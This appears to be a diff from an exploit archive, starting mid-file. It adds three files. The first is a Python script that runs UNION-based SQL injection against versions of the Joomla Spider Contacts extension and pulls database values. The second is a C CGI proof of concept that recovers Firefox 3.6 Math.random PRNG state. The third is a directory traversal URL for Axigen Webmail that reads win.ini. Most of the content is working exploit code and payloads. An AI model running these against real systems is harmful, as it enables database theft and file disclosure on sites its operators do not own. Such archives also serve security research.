'1%20UNION%20ALL%20SELECT%20CONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28'+cmd+'%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23',
# SQLi Spider Contacts 1.3.3
'1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28'+cmd+'%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23',
# SQLi Spider Contacts 1.3
'1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CCONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28'+cmd+'%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23',
# SQLi Spider Contacts 1.2 - 1.1 - 1.0
'-9900%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28'+cmd+'%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23',
]
return SqlInjList
def checkProtocol(pr):
parsedHost = ""
PORT = m_oOptions.port
if pr[0:8] == "https://":
parsedHost = pr[8:]
if parsedHost.endswith("/"):
parsedHost = parsedHost.replace("/","")
if PORT == 0:
PORT = 443
PROTO = httplib.HTTPSConnection(parsedHost, PORT)
elif pr[0:7] == "http://":
parsedHost = pr[7:]
if parsedHost.endswith("/"):
parsedHost = parsedHost.replace("/","")
if PORT == 0:
PORT = 80
PROTO = httplib.HTTPConnection(parsedHost, PORT)
else:
parsedHost = pr
if parsedHost.endswith("/"):
parsedHost = parsedHost.replace("/","")
if PORT == 0:
PORT = 80
PROTO = httplib.HTTPConnection(parsedHost, PORT)
return PROTO, parsedHost
def connection(addr, url_string):
parsedHost = checkProtocol(addr)[1]
PROTO = checkProtocol(addr)[0]
try:
socket.gethostbyname(parsedHost)
except socket.gaierror:
print 'Hostname could not be resolved. Exiting'
sys.exit()
connection_req = checkProtocol(addr)[0]
try:
connection_req.request('GET', url_string)
except socket.error:
print('Connection Error')
sys.exit(1)
response = connection_req.getresponse()
reader = codecs.getreader("utf-8")(response)
return {'response':response, 'reader':reader}
if __name__ == '__main__':
m_oOpts = optparse.OptionParser("%prog -H http[s]://Host_or_IP [-b, --base base_dir] [-p, --port PORT]")
m_oOpts.add_option('--host', '-H', action='store', type='string',
help='The address of the host running Spider Contacts extension(required)')
m_oOpts.add_option('--base', '-b', action='store', type='string', default="/",
help='base dir joomla installation, default "/")')
m_oOpts.add_option('--port', '-p', action='store', type='int', default=0,
help='The port on which the daemon is running (default 80)')
m_oOptions, remainder = m_oOpts.parse_args()
m_nHost = m_oOptions.host
m_nPort = m_oOptions.port
m_nBase = m_oOptions.base
if not m_nHost:
print(banner)
print m_oOpts.format_help()
sys.exit(1)
print(banner)
if m_nBase != "/":
if m_nBase[0] == "/":
m_nBase = m_nBase[1:]
if m_nBase[-1] == "/":
m_nBase = m_nBase[:-1]
else:
if m_nBase[-1] == "/":
m_nBase = m_nBase[:-1]
m_nBase = '/'+m_nBase+'/'
payload = def_payload('1%27')
com_spidercalendar = com_com_spidercalendar()
# Start connection to host for Joomla Spider Contacts vulnerability
response = connection(m_nHost, m_nBase+com_spidercalendar).values()[0]
reader = connection(m_nHost, m_nBase+com_spidercalendar).values()[1]
# Read connection code number
getcode = response.status
print("[+] Searching for Joomla Spider Contacts vulnerability...")
print("[+]")
if getcode != 404:
for lines in reader:
if not lines.find("spidercontacts_contacts.id") == -1:
print("[!] Boolean SQL injection vulnerability FOUND!")
print("[+]")
print("[+] Detection version in progress....")
print("[+]")
try:
response = connection(m_nHost, m_nBase+ver_spidercontacts).values()[0]
reader = connection(m_nHost, m_nBase+ver_spidercontacts).values()[1]
getcode = response.status
if getcode != 404:
for line_version in reader:
if not line_version.find("<version>") == -1:
VER = re.compile('>(.*?)<').search(line_version).group(1)
VER_REP = VER.replace(".","")
if int(VER_REP) > 136 or int(VER_REP[0]) == 2:
print("[X] VERSION: "+VER)
print("[X] Joomla Spider Contacts => 1.3.7 are not vulnerables")
sys.exit(1)
elif int(VER_REP) == 136:
print("[+] EXTENSION VERSION: "+VER)
print("[+]")
for cmddesc, cmdsqli in C0mm4nds.items():
try:
paysql = cmdMySQL(cmdsqli)[0]
payload = def_payload(paysql)
com_spidercalendar = com_com_spidercalendar()
response = connection(m_nHost, m_nBase+com_spidercalendar).values()[0]
reader = connection(m_nHost, m_nBase+com_spidercalendar).values()[1]
getcode = response.status
if getcode != 404:
for line_response in reader:
if not line_response.find("h0m3l4b1t") == -1:
MYSQL_VER = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(line_response).group(1)
if vuln == 0:
print("[!] "+m_nHost+" VULNERABLE!!!")
print("[+]")
print("[!] "+cmddesc+" : "+MYSQL_VER)
vuln = 1
break
except socket.error:
print('[X] Connection was lost please retry')
sys.exit(1)
elif int(VER_REP) == 135 or int(VER_REP) == 134:
print("[+] EXTENSION VERSION: "+VER)
print("[+]")
for cmddesc, cmdsqli in C0mm4nds.items():
try:
paysql = cmdMySQL(cmdsqli)[1]
payload = def_payload(paysql)
com_spidercalendar = com_com_spidercalendar()
response = connection(m_nHost, m_nBase+com_spidercalendar).values()[0]
reader = connection(m_nHost, m_nBase+com_spidercalendar).values()[1]
getcode = response.status
if getcode != 404:
for line_response in reader:
if not line_response.find("h0m3l4b1t") == -1:
MYSQL_VER = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(line_response).group(1)
if vuln == 0:
print("[!] "+m_nHost+" VULNERABLE!!!")
print("[+]")
print("[!] "+cmddesc+" : "+MYSQL_VER)
vuln = 1
break
except socket.error:
print('[X] Connection was lost please retry')
sys.exit(1)
elif int(VER_REP) == 133:
print("[+] EXTENSION VERSION: "+VER)
print("[+]")
for cmddesc, cmdsqli in C0mm4nds.items():
try:
paysql = cmdMySQL(cmdsqli)[2]
payload = def_payload(paysql)
com_spidercalendar = com_com_spidercalendar()
response = connection(m_nHost, m_nBase+com_spidercalendar).values()[0]
reader = connection(m_nHost, m_nBase+com_spidercalendar).values()[1]
getcode = response.status
if getcode != 404:
for line_response in reader:
if not line_response.find("h0m3l4b1t") == -1:
MYSQL_VER = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(line_response).group(1)
if vuln == 0:
print("[!] "+m_nHost+" VULNERABLE!!!")
print("[+]")
print("[!] "+cmddesc+" : "+MYSQL_VER)
vuln = 1
break
except socket.error:
print('[X] Connection was lost please retry')
sys.exit(1)
elif int(VER_REP) == 13:
print("[+] EXTENSION VERSION: "+VER)
print("[+]")
for cmddesc, cmdsqli in C0mm4nds.items():
try:
paysql = cmdMySQL(cmdsqli)[3]
payload = def_payload(paysql)
com_spidercalendar = com_com_spidercalendar()
response = connection(m_nHost, m_nBase+com_spidercalendar).values()[0]
reader = connection(m_nHost, m_nBase+com_spidercalendar).values()[1]
getcode = response.status
if getcode != 404:
for line_response in reader:
if not line_response.find("h0m3l4b1t") == -1:
MYSQL_VER = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(line_response).group(1)
if vuln == 0:
print("[!] "+m_nHost+" VULNERABLE!!!")
print("[+]")
print("[!] "+cmddesc+" : "+MYSQL_VER)
vuln = 1
break
except socket.error:
print('[X] Connection was lost please retry')
sys.exit(1)
elif int(VER_REP[:2]) == 10 or int(VER_REP[:2]) == 11 or int(VER_REP[:2]) == 12:
print("[+] EXTENSION VERSION: "+VER)
print("[+]")
for cmddesc, cmdsqli in C0mm4nds.items():
try:
paysql = cmdMySQL(cmdsqli)[4]
payload = def_payload(paysql)
com_spidercalendar = com_com_spidercalendar()
response = connection(m_nHost, m_nBase+com_spidercalendar).values()[0]
reader = connection(m_nHost, m_nBase+com_spidercalendar).values()[1]
getcode = response.status
if getcode != 404:
for line_response in reader:
if not line_response.find("h0m3l4b1t") == -1:
MYSQL_VER = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(line_response).group(1)
if vuln == 0:
print("[!] "+m_nHost+" VULNERABLE!!!")
print("[+]")
print("[!] "+cmddesc+" : "+MYSQL_VER)
vuln = 1
break
except socket.error:
print('[X] Connection was lost please retry')
sys.exit(1)
else:
print("[-] EXTENSION VERSION: Unknown :(")
sys.exit(0)
if int(vuln) == 0:
# VERSION NOT VULNERABLE :(
print("[X] Spider Contacts patched or SQLi blocked by Web Application Firewall")
sys.exit(1)
else:
sys.exit(0)
except socket.error:
print('[X] Connection was lost please retry')
sys.exit(1)
# NO SQL BLIND DETECTED
print("[X] Spider Contacts patched or SQLi blocked by Web Application Firewall")
sys.exit(1)
else:
print('[X] URL "'+m_nHost+m_nBase+com_spidercalendar+'" NOT FOUND')
sys.exit(1)

109
platforms/unix/remote/34621.c Executable file
View file

@ -0,0 +1,109 @@
source: http://www.securityfocus.com/bid/43222/info
Mozilla Firefox is prone to a cross-domain information-disclosure vulnerability.
An attacker can exploit this issue by tricking an unsuspecting victim into viewing a page containing malicious content.
Successful exploits will allow attackers to bypass the same-origin policy and obtain potentially sensitive information; other attacks are possible.
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
typedef unsigned long long int uint64;
typedef unsigned int uint32;
#define UINT64(x) (x##ULL)
#define a UINT64(0x5DEECE66D)
#define b UINT64(0xB)
uint64 adv(uint64 x)
{
return (a*x+b) & ((UINT64(1)<<48)-1);
}
unsigned int calc(double sample,uint64* state)
{
int v;
uint64 sample_int=sample*((double)(UINT64(1)<<53));
uint32 x1=sample_int>>27;
uint32 x2=sample_int & ((1<<27)-1);
uint32 out;
if ((sample>=1.0) || (sample<0.0))
{
// Error - bad input
return 1;
}
for (v=0;v<(1<<22);v++)
{
*state=adv((((uint64)x1)<<22)|v);
out=((*state)>>(48-27))&((1<<27)-1);
if (out==x2)
{
return 0;
}
}
// Could not find PRNG internal state
return 2;
}
int main(int argc, char* argv[])
{
char body[1000]="";
char head[]="\
<html>\
<body>\
<script>\
document.write('userAgent: '+navigator.userAgent);\
</script>\
<br>\
";
char tail[]="\
<form method='GET' onSubmit='f()'>\
<input type='hidden' name='r'>\
<input id='x' type='submit' name='dummy'\
value='Calculate Firefox 3.6.4-3.6.8 PRNG state'>\
</form>\
<script>\
function f()\
{\
document.forms[0].r.value=Math.random();\
}\
</script>\
</body>\
</html>\
";
char tail2[]="\
</body>\
</html>\
";
double r;
char msg[1000];
int rc;
uint64 state;
strcat(body,head);
if (strstr(getenv("QUERY_STRING"),"r=")!=NULL)
{
sscanf(getenv("QUERY_STRING"),"r=%lf",&r);
rc=calc(r,&state);
if (rc==0)
{
sprintf(msg,"PRNG state (hex): %012llx\n",state);
strcat(body,msg);
}
else
{
sprintf(msg,"Error in calc(): %d\n",rc);
strcat(body,msg);
}
strcat(body,tail2);
}
else
{
strcat(body,tail);
}
printf("Content-Type: text/html\r\n");
printf("Content-Length: %d\r\n",strlen(body));
printf("Cache-Control: no-cache\r\n");
printf("\r\n");
printf("%s",body);
return;
}

9
platforms/windows/remote/34622.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43230/info
Axigen Webmail is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
Axigen Webmail 7.4.1 is vulnerable; other versions may be affected.
http://www.example.com/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini